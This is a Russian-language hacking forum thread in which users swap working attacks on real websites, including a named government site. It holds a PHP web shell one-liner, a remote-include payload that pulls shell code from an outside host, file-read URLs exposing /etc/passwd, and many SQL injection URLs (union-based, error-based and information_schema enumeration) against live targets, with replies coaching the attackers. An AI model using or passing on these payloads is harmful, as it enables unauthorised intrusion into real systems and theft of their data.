<? assert(stripslashes($_REQUEST[cmd])); ?> site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
Делаю так: http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls -la и так http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls выводит текст файла, т.е. <? if (!empty($_GET['c'])) { echo '<pre>'; system($_GET['c']); echo '</pre>'; }exit; ?> Как можно заюзать?
ALIM 1. это не инклуд, просто файл открывается в фрейме 2. там используется технология ASP, а ты прикрепляеш пхп файл и хочеш интерпретировать ) и 3. если ASP то там 99% винда, а ты экзекаеш команду юникс ))
ALIM Файлы читает http://www.echoeshub.com/recordings/ew.php?fname=/etc/passwd http://www.echoeshub.com/recordings/ew.php?fname=index.php http://www.echoeshub.com/recordings/ew.php?fname=jumphere.css
Всем привет. Подобрал количество полей. Как я понял вывод одного поля. http://imperial.ca.gov/dept.php?id=-1+order+by+1 Но если попытаться вывести поле пишет ошибку - different number of columns http://imperial.ca.gov/dept.php?id=-1+union+select+1 т.е. возможно, что здесь 3 версия MySQL? Как нибудь инфу можно вытащить? Или где почитать про это можно? Спасибо.
h3xf0x, в 3 union нет. возможно несколько запросов, методом тыка подбирайте или выплевывайте в ошибки, ну или как слепую уже крутите. а в title что http://imperial.ca.gov/dept.php?id=-32+union+select+version()-- <title>:: City of Imperial - 5.0.27-community-nt ::</title>
Error Based метод: Code: http://imperial.ca.gov/dept.php?id=-1%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%201 2Strilo4ka, версия там 5.0.27-community-nt
В таблице 59 колонок: http://www.site.com/index.php?id=-23+union+select+1,count(*),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=admins+--+ 59 Запрос вывел только 33 колонки. http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name!='admins'+and+column_name>'NewKategorie4'+--+ Mitgliedsnummer, Titel, VorName, Name, Firma, Adresse, PLZ, Ort, Land, Tel, Mobil, Fax, EMail, BCEMail, Internet, Zustelladresse, BName, Beschreibung, Leitspruch, Branche1, Branche2, Branche3, Branche4, Branche5, Kategorie1, Kategorie2, Kategorie3, Kategorie4, Kategorie5, NewKategorie1, NewKategorie2, NewKategorie3, NewKategorie4 Помогите исправить ошибки в запросе, чтобы вывести остальные имена колонок в таблице через group_concat() не использую limit: http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name!='admins'+and+column_name>'NewKategorie4'+--+
http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'-- если каунт выводит 59 эт не факт что на вывод будет колонок 59....
FlaktW http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins' http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins'+and+column_name>'последняя выведенная колонка в предидущем запросе'
Все повторяется.. уже годами так.. одни и теже вопросы и ответы.. вопросы... одни и теже ответы + одни и теже цитаты с "sql inj. faq" даже это уже было уже сказано 10005000 раз..
Мене заинтересовал такой тип атак, как переполнение буфера. Как он используется в программах я примерно понял, а вот как использовать его в интернете до меня пока не дошло . Дайте пожалуйста пару ссылок на описание этой уязвимости и способах её реализации для новичков.
